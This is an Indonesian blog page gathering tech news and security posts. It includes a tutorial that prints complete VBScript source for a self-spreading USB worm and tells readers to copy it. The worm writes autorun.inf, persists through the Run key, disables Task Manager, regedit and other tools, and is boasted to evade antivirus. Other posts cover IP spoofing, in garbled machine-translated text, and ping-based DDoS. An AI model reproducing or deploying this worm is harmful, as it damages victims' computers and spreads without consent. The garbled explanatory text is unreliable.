Seperti yang disampaikan Menkomifo Prof. Dr. M. Nuh, “Paling lambat awal 2010 semua penduduk pedesaan termasuk desa terpencil sekalipun sudah bisa menikmati jaringan telekomunikasi bahkan internet. Mereka juga sudah bisa mengoperasikannya,” dilansir KabarIT dari situs Depkominfo.

Penjangkauan internet ini bertujuan untuk meningkatkan pendidikan dan ekonomi masyarakat desa. Isi content berupa e-education dan e-health dapat meningkatkan pengetahuan warga desa dalam informasi pendidikan dan kesehatan.

Selaian itu para penduduk desa dapat melakukan transaksi antar daerah maupun antar negara. Hasil ekonomi pedesaaan dapat menasional bahkan go internasional. Kerajianan rakayat dapat dipasarkan di gerai-gerai seni ibu kota dan luar negeri.

Program yang dianggarkan pemerintah mencapai Rp 2 triliun ini kedepannya mentargetkan desa-desa tersebut memiliki “rumah pintar” yang memiliki berbagai fasilitas pendidikan dan termasuk internet.

Sumber: kabarit.com:

Hebat, SMKN 7 Samarinda Siap Produksi Ribuan Laptop

Sebuah sekolah di Kaltim, yakni SMKN 7 Samarinda menyatakan siap memproduksi laptop secara massal. Laptop rakitan sendiri itu untuk memenuhi kebutuhan barang elektronik murah namun berkualitas kepada guru, pelajar, serta masyarakat umum di "Kota Tepian" pada 2010.

"Sekolah kami mendapat rekomendasi dan kewenangan untuk merakit laptop secara massal," kata Kepala SMKN 7 Samarinda, Edih Rahmanuddin di Samarinda, Rabu (10/6). Melihat potensi dan kemampuan SMKN 7 tersebut, Dinas Pendidikan (Disdik) Kota menyatakan dukungannya setelah melihat karya para pelajar di sekolah kejuruan negeri itu.

Realisasi dukungan pihak Disdik itu tercermin dari pengajuan anggaran sebesar Rp 600 juta dalam RAPBD 2010 Kota Samarinda yang dialokasikan untuk pengadaan 2.000 unit laptop dari SMKN 7. Pembelian ribuan alat eletronik terkait dengan program Disdik Samarinda untuk memberikan bantuan laptop secara gratis kepada guru-guru di kota berpenduduk sekitar 700.000 jiwa itu.

Pemberian bantuan laptop secara gratis untuk tahap awal ditujukan kepada 2.000 guru di Samarinda. Pembagian laptop yang akan luga dilengkapi dengan peralatan akses internet itu merupakan tindak lanjut dari sebuah wacana yang dilemparkan Mendiknas Bambang Sudibyo dalam kunjungan kerja ke Kaltim belum lama ini.

Pihak SMKN 7 kini sudah menyiapkan ruang yang akan digunakan untuk merakit laptop secara massal. Mengenai siswa dan guru pembimbing sudah siap melaksanakan program tersebut. "Semua siswa sudah siap, bahkan anak-anak ada yang mengaku tidak sabar lagi ingin segera merakit laptop. Selama ini, kami sudah bisa merangkit laptop namun belum secara massal," ujar dia.

SMKN 7 memiliki tiga jurusan kompetensi, yakni jurusan multimedia, jurusan rekayasa piranti lunak, serta jurusan teknik komputer dan jaringan. "Total siswa SMKN kini mencapai 803 pelajar. Dari jumlah tersebut, 45 persen di antaranya mampu merakit laptop sehingga kami tidak khawatir untuk perakitan laptop secara massal," imbuh dia.

Seorang siswa mampu menyelesaikan rakitan kurang dari dua jam sehingga pihaknya tidak akan kesulitan merakit ribuan laptop dalam waktu tidak terlalu lama. Edih juga mengaku bahwa ada perusahaan vendor komputer di Jakarta yang tertarik untuk melakukan kerja sama

"Antara pihak sekolah dan perusahaan tersebut sudah melakukan kontak. Kami menyatakan siap dan kini masih menunggu tindak lanjut untuk melakukan kerjasama," katanya.

"Dalam kerjasama itu, pihak perusahaan berjanji bahwa SMKN 7 bukan saja diberi kepercayaan memproduksi (merakit) laptop namun juga mendukung pemasaran, khususnya bagi sekolah-sekolah di Samarinda," kata Edih.

Membuat Virus Sederhana - Notepad

Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.

Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(”WScript.Shell”)

‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Ponsel Tenaga Surya Indosat Mulai Dipasarkan

Berita Koran IT - Ponsel tenaga surya yang waktu itu diperkenalkan Indosat di ajang Indonesian Celluler Show (ICS) 2009, kini mulai dirilis ke pasar. Namun sayang, harganya jadi sedikit lebih mahal.

Harga ponsel 'Gaya' ini dibanderol Rp 480 ribu. Padahal waktu di ICS, ponsel yang dipesan khusus Indosat dari produsen Comtiva Technology asal Amerika Serikat, katanya akan dilepas dengan harga Rp 450 ribu.

Dari penjelasan tertulis Indosat, harga segitu sudah termasuk bundling kartu perdana prabayar Mentari yang menghadirkan bonus 50 SMS setiap akumulasi isi ulang Rp 20 ribu, bonus internet 220 menit, dan bonus bicara 120 menit.

Sesuai dengan namanya, ponsel tenaga surya ini jelas lebih berguna bagi pengguna luar ruang alias outdoor. Ponsel trendi yang diklaim anti guncang dan anti debu ini, memiliki power management berupa automatic charge jika terkena sinar matahari, apabila kapasitas baterai kurang dari 90%.

Indosat yang menargetkan 50 ribu pengguna ponsel bundling Mentari ini, juga membidik para petani dan nelayan melalui program kerja sama dengan Dewan Koperasi Indonesia (Dekopin) dan Induk Koperasi Tani dan Nelayan (INKOPTAN).

"Dalam waktu dekat ponsel ini juga dapat dinikmati oleh masyarakat luas," pungkas Johnny Swandi Sjam, Direktur Utama Indosat, dalam keterangannya, Kamis (16/7/2009).

sumber : koran-internet.com

Polisi Mulai Merazia Pengguna Rapidshare

Berita mengejutkan datang buat para pengguna Rapidshare, Berhati-hatilah karena kini polisi mulai merazia pengguna layanan tersebut.

Hal ini dikarenakan Rapidshare disebutkan telah membuka data penggunanya yang mengunggah (upload) file-file melanggar hak cipta. Makanya kini para pengguna Rapidshare pun mulai diburu oleh polisi.

Hal itu benar-benar terjadi .Salah satu korban perburuan itu adalah seorang pengguna Rapidshare yang kedatangan ‘tamu tak diundang’ alias razia di rumahnya. Kepolisian merazia orang itu karena ketahuan mengunggah album terbaru Metallica.

Seperti dikutip dari TorrentFreak, Senin (27/4/2009), razia tersebut merupakan buntut dari diserahkannya data pengguna oleh Rapidshare pada pemilik hak cipta seperti perusahaan rekaman. Diduga pihak perusahaan rekaman memanfaatkan paragraf 101 dalam hukum hak cipta yang berlaku di Jerman.

Sebelumnya, paragraf tersebut digunakan untuk meminta Internet Service Provider (ISP) untuk mengungkap alamat IP pengguna layanan berbagi file. Kini, paragraf yang sama bisa digunakan untuk meminta perusahaan seperti Rapidshare untuk mengungkap identitas penggunanya.

Rapidshare selama ini menyediakan layanan hosting file yang bisa diakses pengguna internet. Pengunggah file di Rapidshare biasanya tak akan ketahuan identitasnya karena tak mempublikasikan alamat IP dan juga tidak berbagi file secara langsung.

Jadi kini berhati-hatilah kamu wahai pemakai jasa Rapidshare…bisa-bisa rumahmu kedatangan polisi juga.

100 domain Dot.Com tertua di Internet

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Selasa, 04 Agustus 2009

Ip Spoofing

Dalam komputer jaringan, istilah IP (Internet Protocol) spoofing alamat merujuk kepada penciptaan IP paket dengan tertempa (spoofed) sumber alamat IP dengan tujuan concealing identitas pengirim atau meniru sistem komputer lain.

How spoofing works



Dasar protokol untuk mengirim data melalui Internet dan banyak lainnya komputer adalah jaringan Internet Protocol ( "IP"). Header dari masing-masing paket berisi IP, antara lain, yang numerik sumber dan alamat tujuan paket. Sumber alamat biasanya alamat yang telah dikirim dari paket. Penempaan oleh kepala sehingga berisi alamat yang berbeda, seorang penyerang bisa menampilkannya bahwa paket yang dikirim oleh komputer yang berbeda. Mesin yang akan menerima paket spoofed Tanggapan akan mengirim kembali ke alamat tertempa sumber, yang berarti bahwa teknik ini digunakan terutama bila penyerang tidak peduli respon atau penyerang memiliki beberapa cara untuk guessing respon.
Cara menggunakan ip spoofing
Dalam beberapa kasus, mungkin dapat dilakukan bagi penyerang untuk melihat respon atau redirect ke komputer sendiri. Hal yang paling biasa adalah ketika penyerang spoofing adalah alamat yang sama pada LAN atau WAN.

Uses of spoofing


IP spoofing yang paling sering digunakan dalam penolakan-of-serangan layanan. Dalam serangan, tujuan adalah untuk korban banjir besar dengan jumlah lalu lintas, dan penyerang tidak peduli menerima tanggapan kepada serangan paket. Paket dengan alamat spoofed sehingga cocok untuk serangan seperti itu. Mereka memiliki keuntungan tambahan untuk keperluan ini-mereka lebih sulit untuk menyaring sejak setiap spoofed paket nampaknya berasal dari alamat yang berbeda, dan mereka menyembunyikan kenyataan sumber serangan. Penolakan serangan layanan yang menggunakan spoofing biasanya memilih secara acak alamat IP dari seluruh ruang alamat, walaupun lebih canggih mekanisme spoofing mungkin menghindari unroutable alamat yang tidak digunakan atau bagian dari ruang alamat IP. Proliferasi yang besar membuat botnets spoofing kurang penting dalam serangan penolakan layanan, namun biasanya memiliki penyerang spoofing tersedia sebagai alat, jika mereka ingin menggunakannya, jadi defenses penolakan terhadap layanan-of-serangan yang mengandalkan validitas sumber IP alamat dalam serangan paket mungkin ada masalah dengan spoofed paket. Backscatter, suatu teknik yang digunakan untuk mengamati penolakan-of-kegiatan dalam serangan layanan Internet, bergantung pada penyerang 'penggunaan IP spoofing untuk efektivitas.

IP spoofing juga dapat menjadi metode serangan jaringan yang digunakan oleh para penyusup untuk mengalahkan langkah-langkah keamanan jaringan, seperti otentikasi berdasarkan alamat IP. Metode ini menyerang pada remote sistem dapat menjadi sangat sulit, karena melibatkan ribuan memodifikasi paket setiap kali. Jenis serangan yang paling efektif dimana percaya ada hubungan antara mesin. Sebagai contoh, adalah umum di beberapa perusahaan untuk memiliki jaringan internal sistem kepercayaan satu sama lain, sehingga pengguna dapat masuk log tanpa username atau password yang ia menghubungkan dari komputer lain pada jaringan internal (dan sebagainya harus sudah bisa log in) . Spoofing oleh sambungan dari mesin yang terpercaya, seorang penyerang dapat mengakses komputer target tanpa otentikasi.

Services vulnerable to IP spoofing



Konfigurasi dan layanan yang rentan terhadap IP spoofing:

* RPC (Remote Prosedur layanan Call)
* Setiap layanan yang menggunakan alamat IP otentikasi
* The X Window sistem
* The R suite layanan (rlogin, RSH, dll)

Defense against spoofing



Packet filtering adalah salah satu pertahanan terhadap serangan IP spoofing. Gateway ke jaringan biasanya melakukan penyaringan masuk, yang memblokir dari paket-paket dari luar jaringan dengan alamat sumber di dalam jaringan. Hal ini mencegah penyerang yang luar spoofing alamat internal mesin. Idealnya gateway juga akan melakukan penyaringan pada keluar jalan keluar paket yang memblokir dari dalam paket-paket dari jaringan dengan alamat sumber yang tidak dalam. Hal ini mencegah seorang penyerang di dalam jaringan melakukan penyaringan dari peluncuran IP spoofing serangan terhadap mesin eksternal.

Upper layers


Hal ini juga dianjurkan untuk merancang protokol jaringan dan layanan sehingga mereka tidak bergantung pada alamat IP sumber untuk otentikasi.
Beberapa protokol lapisan atas mereka sendiri memberikan pembelaan terhadap IP spoofing. Misalnya, Transmission Control Protocol (TCP) menggunakan urutan nomor negosiasi dengan remote mesin untuk memastikan bahwa tiba adalah bagian dari paket yang didirikan sambungan. Sejak penyerang biasanya tidak dapat melihat paket balasan, ia telah menebak urutan nomor untuk membajak sambungan. Masyarakat miskin dalam pelaksanaan lebih banyak sistem operasi dan perangkat jaringan, namun berarti TCP urutan nomor dapat diprediksi.

Other definitions


Istilah spoofing juga kadang digunakan untuk merujuk kepada kepala pemalsuan, dengan masuknya informasi palsu atau menyesatkan dalam e-mail atau netnews header. Dipalsukan header digunakan untuk menyesatkan penerima, atau jaringan aplikasi, mengenai asal pesan. Ini adalah teknik umum spammer dan sporgers, yang ingin menyembunyikan asal mereka untuk menghindari pesan dilacak bawah.

DDOS Attack

Penjelasan Mengenai DDOS Attack

Serangan DDOS ( Denial Distribute of services ) Attack, mungkin adalah serangan yang paling simple di lakukan namun efeknya sangat berbahaya.
Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan situs nya tidak bisa di akses selama beberapa jam.

Yang terbaru adalah situs e-gold.com pada tahun 2005 kemarin, situs nya di serang dengan memakai metode DDOS ( Denial Distribute of services ).

Bagaimana cara kerja DDOS ?

Jika Anda memakai program windows , coba lakukan ini di komputer Anda.

1. Start , Programs , Accessories , Command Prompt
2. Kemudian di Command prompt ketikan , Ping -t www.situsyangdituju.com

atau bisa juga Start, Run , Ping -t www.situsyangdituju.com

Kemudian komputer Anda akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer Anda mengirimkan ucapan "Halo , apa ada orang di situ ? " , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : "ya, di sini ada orang"

Sekarang bayangkan, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.

Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang.

Pertanyaan nya , bagaimana 10.000 komputer tersebut bisa ikut melakukan serangan ?

Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan Ping ke situs yang di tuju. Oleh karena itu pentingnya ada firewall di komputer anda, untuk memonitor paket yang keluar maupun yang masuk dari komputer anda.

Jika anda belum memiliki firewall bisa coba zone alarm, silahkan download di zonelabs.com Adware biasanya di dapat dari program-program gratisan yang anda download, untuk itu juga harus berhati-hati mendownload program gratisan.


Bagaimana jika ada situs yang mengklaim situsnya sedang di serang , bagaimana kita tahu itu benar atau bohong ?

Bisa kita lakukan analisa untuk mendeteksi benar atau tidaknya serangan tersebut terjadi, atau hanya mengaku-ngaku saja.

Jika anda berkecimpung di dunia Investment semacam HYIP, autosurf , atau pun situs investasi lainnya.
biasanya sering anda jumpai ada situs yang adminnya bilang situsnya sedang di serang pakai metode DDOS, dan terpaksa harus menutup situs nya, ujung-ujungnya yah admin tersebut melakukan SCAM, atau tidak membayar membernya.

Berikut tahap-tahap melakukan analisa benar atau tidaknya situs tsb di serang.

1. Beri Nilai kemampuan finansial dari situs investasi tersebut.

- Sekarang ini sudah banyak jasa penyedia ANTI DDOS , biaya nya pun cukup mahal yakni berkisar $600 / bulan sampai dengan $1000 / bulan.

sekarang anda nilai situs tersebut, apakah mampu membayar jasa tersebut atau tidak. Jika bisnis nya bernilai ratusan ribu dollar , masak sih tidak mau ngeluarin uang $600 / bulan untuk mengamankan situs nya ? Sering anda lihat kan , ada situs investasi yang menulis :

Total investasi : sekian ratus ribu dollar
Total Withdrawal : sekian ratus ribu dollar

Jika benar uangnya sebanyak itu, tentu tidak ragu untuk membayar services ANTI DDOS sebesar $600 / bulan.


2. Periksa kebenaran.

Jika situs tersebut mengklaim mereka memiliki dan menyewa services ANTI DDOS, tanyakan di mana mereka menyewanya . biasanya di situs penyedia layanan ANTI DDOS di tulis nama-nama client yang menggunakan atau memakai services mereka.

3. Periksa hostingnya, apakah menggunakan satu private IP address, atau shared IP address.

Private IP address artinya = 1 nomor IP untuk 1 domain
Shared IP address artinya = 1 nomor IP untuk BANYAK DOMAIN.

sebagai contoh :
situs semuabisnis.com menggunakan shared IP address. IP untuk domain semuabisnis.com adalah http://75.126.30.10/ dan ada sekitar 14 domain / situs yang menggunakan IP ini , salah satunya adalah ambri-servers.com

Jadi jika situs semuabisnis.com di serang, maka efeknya akan terasa juga di ambri-servers.com maupun di situs-situs lainnya yang memiliki IP yang sama dengan semuabisnis.com .

Jika semuabisnis.com mengaku di serang, namun anda masih bisa mengakses ambri-servers.com ataupun masih bisa mengakses situs lainnya yang memiliki IP yang sama dengan semuabisnis.com , maka itu tidak benar paling cuma buat gaya-gayaan.. hehehe.

Begitu juga dengan situs investasi yang mengaku situs nya di serang, coba periksa ip addressnya. menggunakan private IP atau shared IP. jika shared IP, coba periksa situs lainnya yang memiliki IP
yang sama dengan situs investasi tersebut. apakah situs lainnya masih bisa di akses atau tidak.

Jika seseorang melakukan serangan ke semuabisnis.com , maka yang tidak bisa di akses bukan hanya situs semuabisnis.com melainkan situs-situs lainnya yang memiliki IP address yang sama akan mengalami overload juga.

Untuk mengecek dia menggunakan Shared hosting atau tidak, lakukan ini.

PING -t situsyangdituju.com

kemudian catat no ip.yg muncul di command prompt.
Setelah itu periksa ip tersebut di http://whois.webhosting.info/no IP jika hanya muncul satu domain, maka IP tersebut khusus untuk 1 domain ( private IP )
Jika banyak nama-nama situs yang muncul, maka IP tersebut adalah 1 IP untuk banyak domain ( shared IP )



Demikan penjelasannya, semoga bermanfaat.